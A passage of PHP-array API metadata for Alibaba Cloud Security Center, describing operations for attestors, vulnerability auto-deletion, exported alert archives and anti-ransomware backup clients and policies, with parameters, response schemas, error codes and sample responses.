['description' => 'The region ID of the KMS key.'."\n", 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7BC55C8F-226E-5AF5-9A2C-2EC43864****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 122,\\n \\"Count\\": 20\\n },\\n \\"Attestors\\": [\\n {\\n \\"KeyVersionId\\": \\"8d7c9c91-57ce-4cf4-a959-1e700e13****\\",\\n \\"KeyId\\": \\"2e81355b-f8e7-4090-8082-a8f8124a****\\",\\n \\"Remark\\": \\"attestor\\",\\n \\"Name\\": \\"attestor-123\\",\\n \\"KeyRegionId\\": \\"cn-hangzhou\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeAttestors', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAttestors', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeAutoDelConfig' => [ 'summary' => 'Queries the number of days during which a detected vulnerability is retained before the vulnerability is automatically deleted.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'Days' => ['description' => 'The number of days during which a detected vulnerability is retained before the vulnerability is automatically deleted.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'C56F66FD-C4EE-4813-ABDC-4FF94B6C384E', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"Days\\": 30,\\n \\"RequestId\\": \\"C56F66FD-C4EE-4813-ABDC-4FF94B6C384E\\"\\n}","errorExample":""},{"type":"xml","example":"\\n C56F66FD-C4EE-4813-ABDC-4FF94B6C384E\\n 30\\n","errorExample":""}]', 'title' => 'DescribeAutoDelConfig', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeAutoDelConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAutoDelConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeBackUpExportInfo' => [ 'summary' => 'Retrieves the list of exported security alert archive data.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'default' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to return on each page in a paged query. Default value: 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'default' => '1', 'title' => ''], ], [ 'name' => 'ExportType', 'in' => 'query', 'schema' => ['description' => 'The type of archive data to export. Valid values:'."\n" ."\n" .'- **suspiciousExport**: security alerts.', 'type' => 'string', 'required' => true, 'example' => 'suspiciousExport', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Valid values:'."\n" ."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '29', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '9', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data.', 'type' => 'array', 'items' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'Link' => ['description' => 'The download URL of the archive data.', 'type' => 'string', 'example' => 'http://xxx.oss-cn-xxx.aliyuncs.com/export/assetInstance_20221221_1671606250570.zip', 'title' => ''], 'Status' => ['description' => 'The status of the archive data export task. Valid values:'."\n" ."\n" .'- **init**: Export initialization.'."\n" .'- **exporting**: Export in progress.'."\n" .'- **success**: Export succeeded.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'Progress' => ['description' => 'The progress percentage (%) of the archive export task.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'CurrentCount' => ['description' => 'The number of entries that have been exported.', 'type' => 'integer', 'format' => 'int32', 'example' => '29', 'title' => ''], 'GmtCreate' => ['description' => 'The creation time of the archive export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671607025000', 'title' => ''], 'Message' => ['description' => 'The error message returned when the archive export task fails.', 'type' => 'string', 'example' => 'success', 'title' => ''], 'FileName' => ['description' => 'The name of the archive export file.', 'type' => 'string', 'example' => 'suspicious_event_20221203', 'title' => ''], 'TotalCount' => ['description' => 'The total number of archive data entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '29', 'title' => ''], 'Id' => ['description' => 'The ID of the archive export task.', 'type' => 'integer', 'format' => 'int64', 'example' => '273698***', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve security alert archive data export list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackUpExportInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackUpExportInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 29,\\n \\"Count\\": 9\\n },\\n \\"Data\\": [\\n {\\n \\"Link\\": \\"http://xxx.oss-cn-xxx.aliyuncs.com/export/assetInstance_20221221_1671606250570.zip\\",\\n \\"Status\\": \\"success\\",\\n \\"Progress\\": 100,\\n \\"CurrentCount\\": 29,\\n \\"GmtCreate\\": 1671607025000,\\n \\"Message\\": \\"success\\",\\n \\"FileName\\": \\"suspicious_event_20221203\\",\\n \\"TotalCount\\": 29,\\n \\"Id\\": 0\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeBackupClients' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'SupportRegionId', 'in' => 'query', 'schema' => ['description' => 'The region supported by the anti-ransomware feature. You can call [DescribeSupportRegion](~~DescribeSupportRegion~~) to query the regions supported by the anti-ransomware feature.', 'type' => 'string', 'required' => true, 'example' => 'cn-hangzhou', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response data of servers that have the anti-ransomware client installed.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each API request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => 'E3ED094C-9EB7-4239-962B-D0FB3D5F23C7', 'title' => ''], 'Clients' => [ 'description' => 'The anti-ransomware client information.', 'type' => 'array', 'items' => [ 'description' => 'The information about the server that has the anti-ransomware client installed.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the ECS instance that has the anti-ransomware client installed.', 'type' => 'string', 'example' => '22f6550d-f294-449b-b6e6-90638fd1****', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the ECS instance that has the anti-ransomware client installed.', 'type' => 'string', 'example' => 'i-bp15hyph4aci99dv****', 'title' => ''], 'ClientStatus' => ['description' => 'The status of the anti-ransomware client.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'- **INSTALLING**: The client is being installed.'."\n" ."\n" .'- **ONLINE**: The client is online.'."\n" ."\n" .'- **UNINSTALLING**: The client is being uninstalled.'."\n" ."\n" .'- **NOT_INSTALLED**: The client is not installed.'."\n" ."\n" .'- **ACTIVATED**: The client is activated.'."\n" ."\n" .'- **CLIENT_CONNECTION_ERROR**: A client connection error occurred.', 'type' => 'string', 'example' => 'ONLINE', 'title' => ''], 'ClientId' => ['description' => 'The anti-ransomware client ID.', 'type' => 'string', 'example' => 'c-000az2f537r73dyh****', 'title' => ''], 'ClientVersion' => ['description' => 'The version number of the anti-ransomware client.', 'type' => 'string', 'example' => '2.0.0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query servers with the anti-ransomware client installed in a specified region', 'summary' => 'Queries servers that have the anti-ransomware client installed in a specified region.', 'description' => 'Queries servers that have the anti-ransomware client installed in a specified region.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupClients'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackupClients', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"E3ED094C-9EB7-4239-962B-D0FB3D5F23C7\\",\\n \\"Clients\\": [\\n {\\n \\"Uuid\\": \\"22f6550d-f294-449b-b6e6-90638fd1****\\",\\n \\"InstanceId\\": \\"i-bp15hyph4aci99dv****\\",\\n \\"ClientStatus\\": \\"ONLINE\\",\\n \\"ClientId\\": \\"c-000az2f537r73dyh****\\",\\n \\"ClientVersion\\": \\"2.0.0\\"\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeBackupFiles' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to which an anti-ransomware policy is applied.'."\n", 'type' => 'string', 'required' => true, 'example' => '6d5b361f-958d-48a8-a9d2-d6e82c1a****', 'title' => ''], ], [ 'name' => 'Path', 'in' => 'query', 'schema' => ['description' => 'The path to the backup file.'."\n", 'type' => 'string', 'required' => false, 'example' => '“”', 'title' => ''], ], [ 'name' => 'SnapshotHash', 'in' => 'query', 'schema' => ['description' => 'The hash value of the backup file.'."\n", 'type' => 'string', 'required' => true, 'example' => 'a7f26223ef3974c6fac324cd37713ab65ab618859d20b4039192a5da44d77b63', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The number of the page to return. Default value: **1**.'."\n", 'type' => 'string', 'deprecated' => false, 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page. Default value: **10**.'."\n", 'type' => 'string', 'required' => true, 'example' => '10', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '00A60A6D-33E0-5D5A-9B7C-E5D4DCA88148', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.'."\n", 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the returned page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries returned per page. Default value: **10**.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of backup files returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '69', 'title' => ''], 'Count' => ['description' => 'The number of backup files returned on the current page.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'BackupFiles' => [ 'description' => 'An array that consists of the backup files returned.'."\n", 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the protected file. Valid values:'."\n" ."\n" .'* **file**: files'."\n" .'* **dir**: folders'."\n", 'type' => 'string', 'example' => 'dir', 'title' => ''], 'Name' => ['description' => 'The name of the anti-ransomware policy.'."\n", 'type' => 'string', 'example' => 'Group 1', 'title' => ''], 'Subtree' => ['description' => 'The path to the subdirectory of the backup file.'."\n", 'type' => 'string', 'example' => 'Python27\\', 'title' => ''], 'Size' => ['description' => 'The size of the backup file. Unit: bytes.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '100', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeBackupFiles', 'summary' => 'Queries backup files.', 'requestParamsDescription' => ' ', 'responseParamsDescription' => ' ', 'extraInfo' => ' ', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupFiles'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackupFiles', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"00A60A6D-33E0-5D5A-9B7C-E5D4DCA88148\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 10,\\n \\"TotalCount\\": 69,\\n \\"Count\\": 10\\n },\\n \\"BackupFiles\\": [\\n {\\n \\"Type\\": \\"dir\\",\\n \\"Name\\": \\"Group 1\\",\\n \\"Subtree\\": \\"Python27\\\\\\\\\\",\\n \\"Size\\": 100\\n }\\n ]\\n}","errorExample":""},{"type":"xml","example":"\\n 00A60A6D-33E0-5D5A-9B7C-E5D4DCA88148\\n \\n 1\\n 10\\n 69\\n 10\\n \\n \\n dir\\n Group 1\\n Python27\\\\\\n 100\\n \\n","errorExample":""}]', ], 'DescribeBackupMachineStatus' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'PolicyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the anti-ransomware backup policy.'."\n" .'>You can call the [DescribeBackupPolicies](~~DescribeBackupPolicies~~) operation to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server to query.'."\n" .'>You can call the [DescribeBackupPolicy](~~DescribeBackupPolicy~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => 'eb2c782e-64f2-4590-a86c-d90164df****', 'title' => ''], ], [ 'name' => 'PolicyVersion', 'in' => 'query', 'schema' => ['description' => 'The version of the protection policy. Valid values:'."\n" ."\n" .'- **1.0.0**: The version of the protection policy is 1.0.0.'."\n" .'- **2.0.0**: The version of the protection policy is 2.0.0.', 'type' => 'string', 'required' => false, 'example' => '2.0.0', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used for troubleshooting.', 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****', 'title' => ''], 'BackupMachineStatus' => [ 'description' => 'The backup status of the server.', 'type' => 'object', 'properties' => [ 'Status' => ['description' => 'The status of the anti-ransomware client. Valid values:'."\n" .'- **NOT_INSTALLED**: not installed'."\n" .'- **CLIENT\\_CONNECTION\\_ERROR**: client status exception'."\n" .'- **ACTIVATED**: normal.', 'type' => 'string', 'example' => 'ACTIVATED', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => 'eb2c782e-64f2-4590-a86c-d90164df****', 'title' => ''], 'VaultId' => ['description' => 'The ID of the backup vault where the backup data is stored.', 'type' => 'string', 'example' => 'v-0005i2qh5fcr6seo****', 'title' => ''], 'ErrorCode' => ['description' => 'The error code returned for an abnormal status.', 'type' => 'string', 'example' => 'CLIENT_CONNECTION_ERROR', 'title' => ''], 'SavedBackupCount' => ['description' => 'The number of restorable versions.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-2zeaqkb80vloxjcj****', 'title' => ''], 'ClientStatus' => ['description' => 'The service status. Valid values:'."\n" ."\n" .'- **ONLINE**: Normal.'."\n" .'- **CLIENT\\_CONNECTION\\_ERROR**: Client connection exception.'."\n" .'- **UNINSTALLING**: Uninstalling.'."\n" .'- **UNINSTALL\\_FAILED**: Uninstall failed.'."\n" .'- **UPGRADING**: Upgrading.'."\n" .'- **UPGRADE\\_FAILED**: Upgrade failed.', 'type' => 'string', 'example' => 'ONLINE', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the server.', 'type' => 'string', 'example' => 'cn-shenzhen', 'title' => ''], 'ClientVersion' => ['description' => 'The version number of the anti-ransomware client.', 'type' => 'string', 'example' => '2.11.0', 'title' => ''], 'ClientId' => ['description' => 'The ID of the anti-ransomware client.', 'type' => 'string', 'example' => 'c-000dbefaw9f7gnbw****', 'title' => ''], 'ErrorList' => [ 'description' => 'The list of error messages reported by the backup server.', 'type' => 'array', 'items' => [ 'description' => 'The fault message reported by the backup server.', 'type' => 'object', 'properties' => [ 'ErrorCode' => ['description' => 'The error code.', 'type' => 'string', 'example' => 'TARGET_NOT_EXIST', 'title' => ''], 'ErrorStatus' => ['description' => 'The error status information.', 'type' => 'string', 'example' => 'FAILED', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ServiceStatus' => ['description' => 'The service status. Valid values:'."\n" .'- **SERVICE_EXCEPTION**: Service exception.'."\n" .'- **RESTORING**: Restoring.'."\n" .'- **BACKING_UP**: Backing up.', 'type' => 'string', 'example' => 'RESTORING', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query backup server status', 'summary' => 'Queries the backup status of servers that are associated with an anti-ransomware backup policy.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '60', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeBackupMachineStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeBackupMachineStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\",\\n \\"BackupMachineStatus\\": {\\n \\"Status\\": \\"ACTIVATED\\",\\n \\"Uuid\\": \\"eb2c782e-64f2-4590-a86c-d90164df****\\",\\n \\"VaultId\\": \\"v-0005i2qh5fcr6seo****\\",\\n \\"ErrorCode\\": \\"CLIENT_CONNECTION_ERROR\\",\\n \\"SavedBackupCount\\": 7,\\n \\"InstanceId\\": \\"i-2zeaqkb80vloxjcj****\\",\\n \\"ClientStatus\\": \\"ONLINE\\",\\n \\"RegionId\\": \\"cn-shenzhen\\",\\n \\"ClientVersion\\": \\"2.11.0\\",\\n \\"ClientId\\": \\"c-000dbefaw9f7gnbw****\\",\\n \\"ErrorList\\": [\\n {\\n \\"ErrorCode\\": \\"TARGET_NOT_EXIST\\",\\n \\"ErrorStatus\\": \\"FAILED\\"\\n }\\n ],\\n \\"ServiceStatus\\": \\"RESTORING\\"\\n }\\n}","type":"json"}]', ], 'DescribeBackupPolicies' => [ 'summary' => 'Query anti-ransomware protection policies.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '92004', 'abilityTreeNodes' => ['FEATUREsas7JO011'], ], 'parameters' => [ [ 'name' => 'Name', 'in' => 'query', 'schema' => ['description' => 'The name of the anti-ransomware protection policy to query.', 'type' => 'string', 'required' => false, 'example' => 'SecurityStrategy-20200303', 'title' => ''], ], [ 'name' => 'MachineRemark', 'in' => 'query', 'schema' => ['description' => 'The identification information of the server protected by the anti-ransomware policy to query. You can enter the IP address or instance ID of the server.', 'type' => 'string', 'required' => false, 'example' => '1.1.XX.XX', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => "\n" ."\n" .'The status of the anti-ransomware protection policy.'."\n" ."\n" .'- **enabled**: The policy is manually enabled.'."\n" ."\n" .'- **disabled**: The policy is manually disabled. After the policy is disabled, running backup tasks will stop.'."\n" ."\n" .'- **closed**: The anti-ransomware capacity is exceeded, and the system disables the policy.'."\n", 'type' => 'string', 'required' => false, 'example' => 'enabled', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of backup policies on each page during paginated queries. Default value: 10, which indicates that each page contains 10 protection policies.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '10', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number from which to start displaying the returned results. Default value: 1, which indicates that the display starts from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. It can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in the returned data.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of backup policies on each page during paginated queries. Default value: 10, which indicates that each page contains 10 backup policies.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'TotalCount' => ['description' => 'The total number of backup policies in the returned data.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Count' => ['description' => 'The number of entries displayed on the current page during paginated queries.', 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Policies' => [ 'description' => 'The details of protection policies.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'ClientErrorCount' => ['description' => 'The number of errors reported by the anti-ransomware client.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'Status' => ['description' => 'The status of the anti-ransomware protection policy.'."\n" ."\n" .'- **enabled**: The policy is manually enabled.'."\n" ."\n" .'- **disabled**: The policy is manually disabled. After the policy is disabled, running backup tasks will stop.'."\n" ."\n" .'- **closed**: The anti-ransomware capacity is exceeded, and the system disables the policy.'."\n", 'type' => 'string', 'example' => 'enabled', 'title' => ''], 'PolicyVersion' => ['description' => 'The version of the protection policy. Valid values:'."\n" ."\n" .'- 1.0.0.'."\n" .'- 2.0.0.', 'type' => 'string', 'example' => '2.0.0', 'title' => ''], 'Policy' => ['description' => 'The content of the anti-ransomware protection policy. This parameter is in JSON format. The following section describes the fields:'."\n" ."\n" .'- **IsDefault**: The type of the protection policy. Valid values:'."\n" .' - **1**: Recommended policy.'."\n" .' - **0**: Custom policy.'."\n" .'- **Include**: The file types to protect. To protect all file types, set this parameter to [].'."\n" .'- **Source**: The server directories to protect. To protect all directories, set this parameter to [].'."\n" .'- **ExcludeSystemPath**: Specifies whether to exclude specified directories. Set this parameter to **true** to exclude directories. If you do not want to exclude directories, you do not need to set this parameter.'."\n" .'- **Exclude**: The specified protection directory addresses. If no specific protection directory address is set, set this parameter to [].'."\n" .'- **Schedule**: The execution time and interval of the data backup task. We recommend that you specify a non-peak hour at a non-round time. The following provides setting examples:'."\n" .' - Example 1: I|1583216092|P21D indicates that the data backup starts at 2020-03-03 14:14:52 and the backup policy is executed at an interval of 3 weeks.'."\n" .' - Example 2: I|1583216092|PT24H indicates that the data backup starts at 2020-03-03 14:14:52 and the backup policy is executed at an interval of 24 hours.'."\n" .'- **Retention**: The retention period of the backup data, in days. 7 indicates 1 week, 365 indicates 1 year, and -1 indicates permanent retention.'."\n" .'- **SpeedLimiter**: The backup network bandwidth limit. For example, 0:24:30720 indicates that the backup network bandwidth limit from 0:00 to 24:00 is 30 MByte/s.'."\n" .'- **UseVss**: Specifies whether to enable the VSS (Windows) feature. Valid values:'."\n" .' - **true**: Enable.'."\n" .' - **false**: Disable.'."\n" ."\n" .'> The VSS (Windows) feature is only available for Windows systems. After it is enabled, it can effectively reduce the issue of individual file backup failures caused by process occupation. We recommend that you enable this feature. After this feature is enabled, file backup for exFAT and FAT32 disk formats will not be supported.'."\n", 'type' => 'string', 'example' => '{"Exclude":["/bin/","/usr/bin/","/sbin/","/boot/","/proc/","/sys/","/srv/","/lib/","/selinux/","/usr/sbin/","/run/","/lib32/","/lib64/","/lost+found/","/var/lib/kubelet/","/var/lib/ntp/proc","/var/lib/container","Windows\\\\","Python27\\\\","Program Files (x86)\\\\","Program Files\\\\","Boot\\\\","$RECYCLE.BIN","System Volume Information\\\\","Users\\\\Administrator\\\\NTUSER.DAT*","ProgramData\\\\","pagefile.sys","Users\\\\Default\\\\NTUSER.DAT*","Users\\\\Administrator\\\\ntuser.*"],"ExcludeSystemPath":true,"Include":[],"IsDefault":1,"Retention":7,"Schedule":"I|1630689360|PT24H","Source":[],"SpeedLimiter":"","UseVss":true}', 'title' => ''], 'UpgradeStatus' => ['description' => 'The upgrade status of the policy. Valid 